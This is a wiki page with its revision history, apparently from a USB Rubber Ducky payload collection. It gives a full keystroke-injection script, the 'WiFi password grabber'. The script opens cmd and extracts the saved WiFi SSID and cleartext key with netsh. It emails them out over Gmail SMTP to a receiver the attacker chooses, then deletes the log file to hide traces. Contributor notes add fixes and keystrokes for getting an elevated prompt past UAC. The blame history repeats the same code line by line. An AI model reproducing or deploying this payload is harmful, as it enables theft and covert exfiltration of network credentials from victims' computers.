wiki-rubber-ducky-usb/Payload---WiFi-password-gra...

### Change the following things;
* **ACCOUNT**: Your **gmail account**
* **PASSWORD**: Your **gmail password**
* **RECEIVER**: The email you want to send the content of Log.txt to

## **Code**;
```
REM Title: WiFi password grabber
REM Author: Siem
REM Version: 4
REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt and emails the contents of Log.txt from a gmail account.
DELAY 3000
REM --> Minimize all windows
WINDOWS d
REM --> Open cmd
WINDOWS r
DELAY 500
STRING cmd
ENTER
DELAY 200
REM --> Getting SSID
STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=:" %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A
ENTER
STRING set A="%A:~1%"
ENTER
REM --> Creating A.txt
STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt
ENTER
REM --> Get network type
STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A
ENTER
REM --> Get authentication
STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A
ENTER
REM --> Get password
STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A
ENTER
REM --> Delete A.txt
STRING del A.txt
ENTER
REM --> Create Log.txt
STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt
ENTER
REM --> Mail Log.txt
STRING powershell
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ACCOUNT@gmail.com', 'PASSWORD')
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'ACCOUNT@gmail.com'
ENTER
STRING $ReportEmail.To.Add('RECEIVER@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'WiFi key grabber'
ENTER
STRING $ReportEmail.Body = (Get-Content Log.txt | out-string)
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 500
REM --> Delete Log.txt and exit
STRING del Log.txt & exit
ENTER
```

### Change log;
1. Original
2. Bug fixes and narrowed commands
3. Send contents of Log.txt instead the file itself
4. Removed the space as delimiter
5. Added the STRING set A="%A:~1%" to be able to use SSID's with spaces as well

### Suggestions;
**If you have any suggestions, write them down here.**

- For me i needed to add a DELAY 50 betwin the powershell exit and the cmd exit.. (But i'm on an Arduino Mini with a special compiler)
- If the wifi ssid has a space like "TPLINK HOME" then A would be set to "TPLINK" and get error "Profile "TPLINK" is not found on the system" -- FIXED
- Added the delay after sending the SMTP message, to make sure the EXIT and DEL log.txt are executed (I had issues with this)

The cmd prompt must be elevated to get any passwords.  If you change from using the WINDOWS r to using the search menu for "cmd" and pressing ctrl+shift+enter you can get a UAC prompt.  From there you'd need to alt+Y to get the elevated prompt.

You can also use the run box but with the following command in Win7 and later:
powershell Start-Process cmd -Verb runAs
Created Payload - WiFi password grabber (markdown) 2015-10-16 15:50:55 +02:00			`### Change the following things;`
			`* ACCOUNT: Your gmail account`
			`* PASSWORD: Your gmail password`
Updated Payload WiFi password grabber (markdown) 2015-10-26 20:01:35 +01:00			`* RECEIVER: The email you want to send the content of Log.txt to`
Created Payload - WiFi password grabber (markdown) 2015-10-16 15:50:55 +02:00
Updated the code and added a change log. 2015-10-25 20:19:55 +01:00			`## Code;`
Updated Payload WiFi password grabber (markdown) 2015-10-18 04:20:45 +02:00			```
Updated the code and added a change log. 2015-10-25 20:19:55 +01:00			`REM Title: WiFi password grabber`
Updated Payload WiFi password grabber (markdown) 2015-10-18 04:21:13 +02:00			`REM Author: Siem`
Added support for SSID's with spaces by removing the space as delimeter and setting the variable after that to use quotation marks and removing the first character (which will be the space) 2017-04-21 11:44:02 +02:00			`REM Version: 4`
Updated the code and added a change log. 2015-10-25 20:19:55 +01:00			`REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt and emails the contents of Log.txt from a gmail account.`
			`DELAY 3000`
			`REM --> Minimize all windows`
Updated Payload WiFi password grabber (markdown) 2015-10-18 04:20:45 +02:00			`WINDOWS d`
			`REM --> Open cmd`
			`WINDOWS r`
			`DELAY 500`
			`STRING cmd`
			`ENTER`
Added support for SSID's with spaces by removing the space as delimeter and setting the variable after that to use quotation marks and removing the first character (which will be the space) 2017-04-21 11:44:02 +02:00			`DELAY 200`
I put some of the commands on 1 line, This saves some time. 2015-10-18 13:20:59 +02:00			`REM --> Getting SSID`
Added support for SSID's with spaces by removing the space as delimeter and setting the variable after that to use quotation marks and removing the first character (which will be the space) 2017-04-21 11:44:02 +02:00			`STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=:" %A in ('netsh wlan show interface ^\| findstr "SSID" ^\| findstr /v "BSSID"') do set A=%A`
			`ENTER`
			`STRING set A="%A:~1%"`
Updated Payload WiFi password grabber (markdown) 2015-10-18 04:20:45 +02:00			`ENTER`
Updated the code and added a change log. 2015-10-25 20:19:55 +01:00			`REM --> Creating A.txt`
			`STRING netsh wlan show profiles %A% key=clear \| findstr /c:"Network type" /c:"Authentication" /c:"Key Content" \| findstr /v "broadcast" \| findstr /v "Radio">>A.txt`
Updated Payload WiFi password grabber (markdown) 2015-10-18 04:20:45 +02:00			`ENTER`
			`REM --> Get network type`
Updated the code and added a change log. 2015-10-25 20:19:55 +01:00			`STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A`
Updated Payload WiFi password grabber (markdown) 2015-10-18 04:20:45 +02:00			`ENTER`
			`REM --> Get authentication`
Updated the code and added a change log. 2015-10-25 20:19:55 +01:00			`STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A`
Updated Payload WiFi password grabber (markdown) 2015-10-18 04:20:45 +02:00			`ENTER`
Updated Payload WiFi password grabber (markdown) 2015-10-27 13:56:59 +01:00			`REM --> Get password`
Updated the code and added a change log. 2015-10-25 20:19:55 +01:00			`STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A`
Updated Payload WiFi password grabber (markdown) 2015-10-18 04:20:45 +02:00			`ENTER`
Updated the code and added a change log. 2015-10-25 20:19:55 +01:00			`REM --> Delete A.txt`
			`STRING del A.txt`
Updated Payload WiFi password grabber (markdown) 2015-10-18 04:20:45 +02:00			`ENTER`
			`REM --> Create Log.txt`
I put some of the commands on 1 line, This saves some time. 2015-10-18 13:20:59 +02:00			`STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt`
Updated Payload WiFi password grabber (markdown) 2015-10-18 04:20:45 +02:00			`ENTER`
			`REM --> Mail Log.txt`
			`STRING powershell`
			`ENTER`
			`STRING $SMTPServer = 'smtp.gmail.com'`
			`ENTER`
			`STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)`
			`ENTER`
			`STRING $SMTPInfo.EnableSsl = $true`
			`ENTER`
Updated the code and added a change log. 2015-10-25 20:19:55 +01:00			`STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ACCOUNT@gmail.com', 'PASSWORD')`
Updated Payload WiFi password grabber (markdown) 2015-10-18 04:20:45 +02:00			`ENTER`
			`STRING $ReportEmail = New-Object System.Net.Mail.MailMessage`
			`ENTER`
			`STRING $ReportEmail.From = 'ACCOUNT@gmail.com'`
			`ENTER`
			`STRING $ReportEmail.To.Add('RECEIVER@gmail.com')`
			`ENTER`
Updated the code and added a change log. 2015-10-25 20:19:55 +01:00			`STRING $ReportEmail.Subject = 'WiFi key grabber'`
Updated Payload WiFi password grabber (markdown) 2015-10-18 04:20:45 +02:00			`ENTER`
Updated the code and added a change log. 2015-10-25 20:19:55 +01:00			`STRING $ReportEmail.Body = (Get-Content Log.txt \| out-string)`
Updated Payload WiFi password grabber (markdown) 2015-10-18 04:20:45 +02:00			`ENTER`
			`STRING $SMTPInfo.Send($ReportEmail)`
			`ENTER`
Added support for SSID's with spaces by removing the space as delimeter and setting the variable after that to use quotation marks and removing the first character (which will be the space) 2017-04-21 11:44:02 +02:00			`DELAY 1000`
Updated Payload WiFi password grabber (markdown) 2015-10-18 04:20:45 +02:00			`STRING exit`
			`ENTER`
Added support for SSID's with spaces by removing the space as delimeter and setting the variable after that to use quotation marks and removing the first character (which will be the space) 2017-04-21 11:44:02 +02:00			`DELAY 500`
Updated Payload WiFi password grabber (markdown) 2015-10-18 04:20:45 +02:00			`REM --> Delete Log.txt and exit`
			`STRING del Log.txt & exit`
			`ENTER`
Updated the code and added a change log. 2015-10-25 20:19:55 +01:00			```

			`### Change log;`
			`1. Original`
			`2. Bug fixes and narrowed commands`
			`3. Send contents of Log.txt instead the file itself`
Added support for SSID's with spaces by removing the space as delimeter and setting the variable after that to use quotation marks and removing the first character (which will be the space) 2017-04-21 11:44:02 +02:00			`4. Removed the space as delimiter`
			`5. Added the STRING set A="%A:~1%" to be able to use SSID's with spaces as well`
Updated the code and added a change log. 2015-10-25 20:19:55 +01:00
			`### Suggestions;`
Added suggestion for getting elevated cmd prompt 2016-09-09 17:32:24 +02:00			`If you have any suggestions, write them down here.`

Added an issue with this payload ! 2016-11-05 02:51:55 +01:00			`- For me i needed to add a DELAY 50 betwin the powershell exit and the cmd exit.. (But i'm on an Arduino Mini with a special compiler)`
Added support for SSID's with spaces by removing the space as delimeter and setting the variable after that to use quotation marks and removing the first character (which will be the space) 2017-04-21 11:44:02 +02:00			`- If the wifi ssid has a space like "TPLINK HOME" then A would be set to "TPLINK" and get error "Profile "TPLINK" is not found on the system" -- FIXED`
			`- Added the delay after sending the SMTP message, to make sure the EXIT and DEL log.txt are executed (I had issues with this)`
Added an issue with this payload ! 2016-11-05 02:51:55 +01:00
Added Win7+ powershell option for getting an elevated cmd prompt 2016-09-09 18:46:54 +02:00			`The cmd prompt must be elevated to get any passwords. If you change from using the WINDOWS r to using the search menu for "cmd" and pressing ctrl+shift+enter you can get a UAC prompt. From there you'd need to alt+Y to get the elevated prompt.`

			`You can also use the run box but with the following command in Win7 and later:`
			`powershell Start-Process cmd -Verb runAs`